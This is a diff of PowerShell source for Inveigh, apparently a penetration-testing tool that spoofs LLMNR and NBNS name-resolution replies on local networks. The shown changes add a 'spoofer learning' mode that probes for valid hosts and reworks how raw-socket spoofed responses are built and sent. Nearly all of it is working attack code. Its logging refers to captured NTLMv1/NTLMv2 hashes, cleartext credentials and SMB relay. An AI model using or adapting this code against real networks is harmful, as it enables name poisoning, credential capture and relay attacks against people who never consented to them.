$NBNS_response_data = $payload_bytes[13..$payload_bytes.Length] +
- $NBNS_TTL_bytes +
- 0x00,0x06,0x00,0x00 +
- ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes()
+ $NBNS_TTL_bytes +
+ 0x00,0x06,0x00,0x00 +
+ ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes()
$NBNS_response_packet = 0x00,0x89 +
$source_port[1,0] +
@@ -1423,9 +1513,6 @@ $sniffer_scriptblock =
0x85,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x20 +
$NBNS_response_data
- $send_socket = New-Object Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwork,[System.Net.Sockets.SocketType]::Raw,[System.Net.Sockets.ProtocolType]::Udp)
- $send_socket.SendBufferSize = 1024
- $destination_point = New-Object Net.IPEndpoint($source_IP,$endpoint_source_port)
$NBNS_query_type = [System.BitConverter]::ToString($payload_bytes[43..44])
switch ($NBNS_query_type)
@@ -1494,17 +1581,80 @@ $sniffer_scriptblock =
}
until($n -gt ($NBNS_query_string_subtracted.Length - 1) -or $NBNS_query_string.Length -eq 15)
+ $NBNS_request_ignore = $false
+
if($NBNS -eq 'Y')
{
+ if($SpooferLearning -eq 'Y' -and $inveigh.valid_host_list -notcontains $NBNS_query_string -and [System.BitConverter]::ToString($payload_bytes[4..7]) -eq '00-01-00-00' -and $source_IP -ne $IP)
+ {
+
+ if(($NBNS_learning_log.Exists({param($s) $s -like "20* $NBNS_query_string"})))
+ {
+ $NBNS_learning_queue_time = [DateTime]$NBNS_learning_log.Find({param($s) $s -like "20* $NBNS_query_string"}).SubString(0,19)
+
+ if((Get-Date) -ge $NBNS_learning_queue_time.AddMinutes($SpooferLearningInterval))
+ {
+ $NBNS_learning_log.RemoveAt($NBNS_learning_log.FindIndex({param($s) $s -like "20* $NBNS_query_string"}))
+ $NBNS_learning_send = $true
+ }
+ else
+ {
+ $NBNS_learning_send = $false
+ }
+
+ }
+ else
+ {
+ $NBNS_learning_send = $true
+ }
+
+ if($NBNS_learning_send)
+ {
+ $NBNS_transaction_ID_bytes = [String](1..2 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
+ $NBNS_transaction_ID_bytes = $NBNS_transaction_ID_bytes.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $NBNS_UDP_client = new-Object System.Net.Sockets.UdpClient 137
+ $NBNS_hostname_bytes = $payload_bytes[13..($payload_bytes.Length - 5)]
+
+ $NBNS_request_packet = $NBNS_transaction_ID_bytes +
+ 0x01,0x10,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x20 +
+ $NBNS_hostname_bytes +
+ 0x00,0x20,0x00,0x01
+
+ $NBNS_learning_destination_endpoint = New-Object System.Net.IPEndpoint([IPAddress]::broadcast,137)
+ $NBNS_UDP_client.Connect($NBNS_learning_destination_endpoint)
+ $NBNS_UDP_client.Send($NBNS_request_packet,$NBNS_request_packet.Length)
+ $NBNS_UDP_client.Close()
+ $NBNS_learning_log.Add("$(Get-Date -format 's') $NBNS_query_string")
+ $inveigh.console_queue.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string sent to " + $NBNS_learning_destination_endpoint.Address.IPAddressToString)
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR request for $NBNS_query_string sent to " + $NBNS_learning_destination_endpoint.Address.IPAddressToString)])
+ }
+
+ }
+
if($NBNSTypes -contains $NBNS_query_type)
{
- if ((!$SpooferHostsReply -or $SpooferHostsReply -contains $NBNS_query_string) -and (!$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $NBNS_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and ($inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP.IPAddressToString) -and ($NBNS_query_string.Trim() -ne '*'))
+ if (($inveigh.valid_host_list -notcontains $NBNS_query_string -or $SpooferHostsReply -contains $NBNS_query_string) -and (!$SpooferHostsReply -or $SpooferHostsReply -contains $NBNS_query_string) -and (
+ !$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $NBNS_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (
+ !$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and ($inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP.IPAddressToString) -and ($NBNS_query_string.Trim() -ne '*') -and (
+ $SpooferLearning -eq 'N' -or ($SpooferLearning -eq 'Y' -and !$SpooferLearningDelay) -or ($SpooferLearningDelay -and $spoofer_learning_stopwatch.Elapsed -ge $spoofer_learning_delay)))
{
- $send_socket.sendTo($NBNS_response_packet,$destination_point)
- $send_socket.Close()
- $NBNS_response_message = "- spoofed response has been sent"
+
+ if($SpooferLearning -eq 'N' -or [System.BitConverter]::ToString($NBNS_transaction_ID_bytes) -ne [System.BitConverter]::ToString($payload_bytes[0..1]))
+ {
+ $NBNS_send_socket = New-Object Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwork,[System.Net.Sockets.SocketType]::Raw,[System.Net.Sockets.ProtocolType]::Udp)
+ $NBNS_send_socket.SendBufferSize = 1024
+ $NBNS_destination_point = New-Object Net.IPEndpoint($source_IP,$endpoint_source_port)
+ $NBNS_send_socket.SendTo($NBNS_response_packet,$NBNS_destination_point)
+ $NBNS_send_socket.Close()
+ $NBNS_response_message = "- spoofed response has been sent"
+ }
+ else
+ {
+ $NBNS_request_ignore = $true
+ }
+
}
else
{
@@ -1527,11 +1677,23 @@ $sniffer_scriptblock =
}
elseif($NBNS_query_string.Trim() -eq '*')
{
- $NBNS_response_message = "- ignoring NBSTAT request"
+ $NBNS_response_message = "- NBSTAT request"
+ }
+ elseif($inveigh.valid_host_list -contains $NBNS_query_string)
+ {
+ $NBNS_response_message = "- $NBNS_query_string is a valid host"
+ }
+ elseif($inveigh.IP_capture_list -contains $source_IP.IPAddressToString)
+ {
+ $NBNS_response_message = "- previous capture from $source_IP"
+ }
+ elseif($SpooferLearningDelay -and $spoofer_learning_stopwatch.Elapsed -lt $spoofer_learning_delay)
+ {
+ $NBNS_response_message = "- " + [Int]($SpooferLearningDelay - $spoofer_learning_stopwatch.Elapsed.TotalMinutes) + " minute(s) until spoofing starts"
}
else
{
- $NBNS_response_message = "- not spoofed due to previous capture"
+ $NBNS_response_message = "- something went wrong"
}
}
@@ -1544,8 +1706,24 @@ $sniffer_scriptblock =
}
- $inveigh.console_queue.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message")])
+ if(!$NBNS_request_ignore -and [System.BitConverter]::ToString($payload_bytes[4..7]) -eq '00-01-00-00')
+ {
+ $inveigh.console_queue.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message")
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message")])
+ }
+ elseif($SpooferLearning -eq 'Y' -and [System.BitConverter]::ToString($payload_bytes[4..7]) -eq '00-00-00-01' -and [System.BitConverter]::ToString($NBNS_transaction_ID_bytes) -eq [System.BitConverter]::ToString($payload_bytes[0..1]))
+ {
+ [Byte[]]$NBNS_response_IP_bytes = $payload_bytes[($payload_bytes.Length - 4)..($payload_bytes.Length)]
+ $NBNS_response_IP = [System.Net.IPAddress]$NBNS_response_IP_bytes
+ $NBNS_response_IP = $NBNS_response_IP.IPAddressToString
+
+ if($inveigh.valid_host_list -notcontains $NBNS_query_string)
+ {
+ $inveigh.valid_host_list.Add($NBNS_query_string)
+ $inveigh.console_queue.Add("$(Get-Date -format 's') - NBNS response $NBNS_response_IP for $NBNS_query_string received from $source_IP - $NBNS_query_string added to valid host list")
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - NBNS response $NBNS_response_IP for $NBNS_query_string received from $source_IP - $NBNS_query_string added to valid host list")])
+ }
+ }
}
}
@@ -1563,12 +1741,12 @@ $sniffer_scriptblock =
([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes()
$LLMNR_response_packet = 0x14,0xeb +
- $source_port[1,0] +
- $UDP_length[1,0] +
- 0x00,0x00 +
- $payload_bytes[0,1] +
- 0x80,0x00,0x00,0x01,0x00,0x01,0x00,0x00,0x00,0x00 +
- $LLMNR_response_data
+ $source_port[1,0] +
+ $UDP_length[1,0] +
+ 0x00,0x00 +
+ $payload_bytes[0,1] +
+ 0x80,0x00,0x00,0x01,0x00,0x01,0x00,0x00,0x00,0x00 +
+ $LLMNR_response_data
$LLMNR_query = [System.BitConverter]::ToString($payload_bytes[13..($payload_bytes.Length - 4)])
$LLMNR_query = $LLMNR_query -replace "-00",""
@@ -1583,18 +1761,79 @@ $sniffer_scriptblock =
$LLMNR_query = $LLMNR_query.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
$LLMNR_query_string = New-Object System.String($LLMNR_query,0,$LLMNR_query.Length)
}
+
+ $LLMNR_request_ignore = $false
if($LLMNR -eq 'Y')
{
- if((!$SpooferHostsReply -or $SpooferHostsReply -contains $LLMNR_query_string) -and (!$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $LLMNR_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and ($inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP.IPAddressToString))
+ if($SpooferLearning -eq 'Y' -and $inveigh.valid_host_list -notcontains $LLMNR_query_string -and $source_IP -ne $IP)
+ {
+
+ if(($LLMNR_learning_log.Exists({param($s) $s -like "20* $LLMNR_query_string"})))
+ {
+ $LLMNR_learning_queue_time = [DateTime]$LLMNR_learning_log.Find({param($s) $s -like "20* $LLMNR_query_string"}).SubString(0,19)
+
+ if((Get-Date) -ge $LLMNR_learning_queue_time.AddMinutes($SpooferLearningInterval))
+ {
+ $LLMNR_learning_log.RemoveAt($LLMNR_learning_log.FindIndex({param($s) $s -like "20* $LLMNR_query_string"}))
+ $LLMNR_learning_send = $true
+ }
+ else
+ {
+ $LLMNR_learning_send = $false
+ }
+
+ }
+ else
+ {
+ $LLMNR_learning_send = $true
+ }
+
+ if($LLMNR_learning_send)
+ {
+ $LLMNR_transaction_ID_bytes = [String](1..2 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
+ $LLMNR_transaction_ID_bytes = $LLMNR_transaction_ID_bytes.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $LLMNR_UDP_client = new-Object System.Net.Sockets.UdpClient
+ $LLMNR_hostname_bytes = $payload_bytes[13..($payload_bytes.Length - 5)]
+
+ $LLMNR_request_packet = $LLMNR_transaction_ID_bytes +
+ 0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00 +
+ ($LLMNR_hostname_bytes.Length - 1) +
+ $LLMNR_hostname_bytes +
+ 0x00,0x01,0x00,0x01
+
+ $LLMNR_learning_destination_endpoint = New-Object System.Net.IPEndpoint([IPAddress]"224.0.0.252",5355)
+ $LLMNR_UDP_client.Connect($LLMNR_learning_destination_endpoint)
+ $LLMNR_UDP_client.Send($LLMNR_request_packet,$LLMNR_request_packet.Length)
+ $LLMNR_UDP_client_port = ($LLMNR_UDP_client.Client.LocalEndPoint).Port
+ $LLMNR_UDP_client.Close()
+ $LLMNR_learning_log.Add("$(Get-Date -format 's') $LLMNR_query_string")
+ $inveigh.console_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string sent to 224.0.0.252")
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string sent to 224.0.0.252")])
+ }
+
+ }
+
+ if(($inveigh.valid_host_list -notcontains $LLMNR_query_string -or $SpooferHostsReply -contains $LLMNR_query_string) -and (!$SpooferHostsReply -or $SpooferHostsReply -contains $LLMNR_query_string) -and (
+ !$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $LLMNR_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (
+ !$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and ($inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP.IPAddressToString) -and (
+ $SpooferLearning -eq 'N' -or ($SpooferLearning -eq 'Y' -and !$SpooferLearningDelay) -or ($SpooferLearningDelay -and $spoofer_learning_stopwatch.Elapsed -ge $spoofer_learning_delay)))
{
- $send_socket = New-Object System.Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwork,[System.Net.Sockets.SocketType]::Raw,[System.Net.Sockets.ProtocolType]::Udp )
- $send_socket.SendBufferSize = 1024
- $destination_point = New-Object System.Net.IPEndpoint($source_IP,$endpoint_source_port)
- $send_socket.SendTo($LLMNR_response_packet,$destination_point)
- $send_socket.Close()
- $LLMNR_response_message = "- spoofed response has been sent"
+
+ if($SpooferLearning -eq 'N' -or [System.BitConverter]::ToString($LLMNR_transaction_ID_bytes) -ne [System.BitConverter]::ToString($payload_bytes[0..1]))
+ {
+ $LLMNR_send_socket = New-Object System.Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwork,[System.Net.Sockets.SocketType]::Raw,[System.Net.Sockets.ProtocolType]::Udp )
+ $LLMNR_send_socket.SendBufferSize = 1024
+ $LLMNR_destination_point = New-Object System.Net.IPEndpoint($source_IP,$endpoint_source_port)
+ $LLMNR_send_socket.SendTo($LLMNR_response_packet,$LLMNR_destination_point)
+ $LLMNR_send_socket.Close()
+ $LLMNR_response_message = "- spoofed response has been sent"
+ }
+ else
+ {
+ $LLMNR_request_ignore = $true
+ }
}
else
{
@@ -1615,21 +1854,72 @@ $sniffer_scriptblock =
{
$LLMNR_response_message = "- $source_IP is on ignore list"
}
+ elseif($inveigh.valid_host_list -contains $LLMNR_query_string)
+ {
+ $LLMNR_response_message = "- $LLMNR_query_string is a valid host"
+ }
+ elseif($inveigh.IP_capture_list -contains $source_IP.IPAddressToString)
+ {
+ $LLMNR_response_message = "- previous capture from $source_IP"
+ }
+ elseif($SpooferLearningDelay -and $spoofer_learning_stopwatch.Elapsed -lt $spoofer_learning_delay)
+ {
+ $LLMNR_response_message = "- " + [Int]($SpooferLearningDelay - $spoofer_learning_stopwatch.Elapsed.TotalMinutes) + " minute(s) until spoofing starts"
+ }
else
{
- $LLMNR_response_message = "- not spoofed due to previous capture"
+ $LLMNR_response_message = "- something went wrong"
}
}
}
- $inveigh.console_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message")])
+ if(!$LLMNR_request_ignore)
+ {
+ $inveigh.console_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message")
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message")])
+ }
+
+ }
+ }
+
+ $LLMNR_UDP_client_port # LLMNR Random Port
+ {
+
+ if($SpooferLearning -eq 'Y' -and [System.BitConverter]::ToString($LLMNR_transaction_ID_bytes) -eq [System.BitConverter]::ToString($payload_bytes[0..1]))
+ {
+ $LLMNR_query = [System.BitConverter]::ToString($payload_bytes[13..($payload_bytes[12] + 13)])
+ $LLMNR_query = $LLMNR_query -replace "-00",""
+
+ if($LLMNR_query.Length -eq 2)
+ {
+ $LLMNR_query = [Char][System.Convert]::ToInt16($LLMNR_query,16)
+ $LLMNR_query_string = New-Object System.String($LLMNR_query)
+ }
+ else
+ {
+ $LLMNR_query = $LLMNR_query.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $LLMNR_query_string = New-Object System.String($LLMNR_query,0,$LLMNR_query.Length)
+ }
+
+ [Byte[]]$LLMNR_response_IP_bytes = $payload_bytes[($payload_bytes.Length - 4)..($payload_bytes.Length)]
+ $LLMNR_response_IP = [System.Net.IPAddress]$LLMNR_response_IP_bytes
+ $LLMNR_response_IP = $LLMNR_response_IP.IPAddressToString
+
+ if($inveigh.valid_host_list -notcontains $LLMNR_query_string)
+ {
+ $inveigh.valid_host_list.Add($LLMNR_query_string)
+ $inveigh.console_queue.Add("$(Get-Date -format 's') - LLMNR response $LLMNR_response_IP for $LLMNR_query_string received from $source_IP - $LLMNR_query_string added to valid host list")
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR response $LLMNR_response_IP for $LLMNR_query_string received from $source_IP - $LLMNR_query_string added to valid host list")])
+ }
+
}
+
}
}
+
}
}
@@ -1692,25 +1982,25 @@ $sniffer_scriptblock =
while($inveigh.log_file_queue.Count -gt 0)
{
$inveigh.log_file_queue[0]|Out-File $inveigh.log_out_file -Append
- $inveigh.log_file_queue.RemoveRange(0,1)
+ $inveigh.log_file_queue.RemoveAt(0)
}
while($inveigh.NTLMv1_file_queue.Count -gt 0)
{
$inveigh.NTLMv1_file_queue[0]|Out-File $inveigh.NTLMv1_out_file -Append
- $inveigh.NTLMv1_file_queue.RemoveRange(0,1)
+ $inveigh.NTLMv1_file_queue.RemoveAt(0)
}
while($inveigh.NTLMv2_file_queue.Count -gt 0)
{
$inveigh.NTLMv2_file_queue[0]|Out-File $inveigh.NTLMv2_out_file -Append
- $inveigh.NTLMv2_file_queue.RemoveRange(0,1)
+ $inveigh.NTLMv2_file_queue.RemoveAt(0)
}
while($inveigh.cleartext_file_queue.Count -gt 0)
{
$inveigh.cleartext_file_queue[0]|Out-File $inveigh.cleartext_out_file -Append
- $inveigh.cleartext_file_queue.RemoveRange(0,1)
+ $inveigh.cleartext_file_queue.RemoveAt(0)
}
}
@@ -1768,6 +2058,7 @@ function SnifferSpoofer()
$NBNS_response_message).AddArgument($IP).AddArgument($SpooferIP).AddArgument($SMB).AddArgument(
$LLMNR).AddArgument($NBNS).AddArgument($NBNSTypes).AddArgument($SpooferHostsReply).AddArgument(
$SpooferHostsIgnore).AddArgument($SpooferIPsReply).AddArgument($SpooferIPsIgnore).AddArgument(
+ $SpooferLearning).AddArgument($SpooferLearningDelay).AddArgument($SpooferLearningInterval).AddArgument(
$RunTime).AddArgument($LLMNRTTL).AddArgument($NBNSTTL) > $null
$sniffer_powershell.BeginInvoke() > $null
}
@@ -1803,7 +2094,7 @@ if($inveigh.console_output)
if($inveigh.output_stream_only)
{
Write-Output($inveigh.console_queue[0] + $inveigh.newline)
- $inveigh.console_queue.RemoveRange(0,1)
+ $inveigh.console_queue.RemoveAt(0)
}
else
{
@@ -1811,12 +2102,6 @@ if($inveigh.console_output)
switch -wildcard ($inveigh.console_queue[0])
{
- "Inveigh *exited *"
- {
- Write-Warning $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveRange(0,1)
- }
-
"* written to *"
{
@@ -1825,31 +2110,31 @@ if($inveigh.console_output)
Write-Warning $inveigh.console_queue[0]
}
- $inveigh.console_queue.RemoveRange(0,1)
+ $inveigh.console_queue.RemoveAt(0)
}
"* for relay *"
{
Write-Warning $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveRange(0,1)
+ $inveigh.console_queue.RemoveAt(0)
}
"*SMB relay *"
{
Write-Warning $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveRange(0,1)
+ $inveigh.console_queue.RemoveAt(0)
}
"* local administrator *"
{
Write-Warning $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveRange(0,1)
+ $inveigh.console_queue.RemoveAt(0)
}
default
{
Write-Output $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveRange(0,1)
+ $inveigh.console_queue.RemoveAt(0)
}
}
@@ -1992,12 +2277,7 @@ function Stop-Inveigh
if($inveigh.unprivileged_running)
{
$inveigh.unprivileged_running = $false
- Write-Output("$(Get-Date -format 's') - Attempting to stop HTTP listener")
- $inveigh.HTTP_listener.server.blocking = $false
- Start-Sleep -s 1
- $inveigh.HTTP_listener.server.Close()
- Start-Sleep -s 1
- $inveigh.HTTP_listener.Stop()
+ Start-Sleep -s 5
Write-Output("Inveigh Unprivileged exited at $(Get-Date -format 's')")
$inveigh.log.Add("$(Get-Date -format 's') - Inveigh Unprivileged exited") > $null
@@ -2088,7 +2368,7 @@ function Get-Inveigh
if($inveigh.output_stream_only)
{
Write-Output($inveigh.console_queue[0] + $inveigh.newline)
- $inveigh.console_queue.RemoveRange(0,1)
+ $inveigh.console_queue.RemoveAt(0)
}
else
{
@@ -2096,12 +2376,6 @@ function Get-Inveigh
switch -wildcard ($inveigh.console_queue[0])
{
- "Inveigh *exited *"
- {
- Write-Warning $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveRange(0,1)
- }
-
"* written to *"
{
@@ -2110,31 +2384,31 @@ function Get-Inveigh
Write-Warning $inveigh.console_queue[0]
}
- $inveigh.console_queue.RemoveRange(0,1)
+ $inveigh.console_queue.RemoveAt(0)
}
"* for relay *"
{
Write-Warning $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveRange(0,1)
+ $inveigh.console_queue.RemoveAt(0)
}
"*SMB relay *"
{
Write-Warning $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveRange(0,1)
+ $inveigh.console_queue.RemoveAt(0)
}
"* local administrator *"
{
Write-Warning $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveRange(0,1)
+ $inveigh.console_queue.RemoveAt(0)
}
default
{
Write-Output $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveRange(0,1)
+ $inveigh.console_queue.RemoveAt(0)
}
}
@@ -2320,7 +2594,7 @@ function Watch-Inveigh
if($inveigh.output_stream_only)
{
Write-Output($inveigh.console_queue[0] + $inveigh.newline)
- $inveigh.console_queue.RemoveRange(0,1)
+ $inveigh.console_queue.RemoveAt(0)
}
else
{
@@ -2331,7 +2605,7 @@ function Watch-Inveigh
"Inveigh *exited *"
{
Write-Warning $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveRange(0,1)
+ $inveigh.console_queue.RemoveAt(0)
}
"* written to *"
@@ -2342,31 +2616,31 @@ function Watch-Inveigh
Write-Warning $inveigh.console_queue[0]
}
- $inveigh.console_queue.RemoveRange(0,1)
+ $inveigh.console_queue.RemoveAt(0)
}
"* for relay *"
{
Write-Warning $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveRange(0,1)
+ $inveigh.console_queue.RemoveAt(0)
}
"*SMB relay *"
{
Write-Warning $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveRange(0,1)
+ $inveigh.console_queue.RemoveAt(0)
}
"* local administrator *"
{
Write-Warning $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveRange(0,1)
+ $inveigh.console_queue.RemoveAt(0)
}
default
{
Write-Output $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveRange(0,1)
+ $inveigh.console_queue.RemoveAt(0)
}
}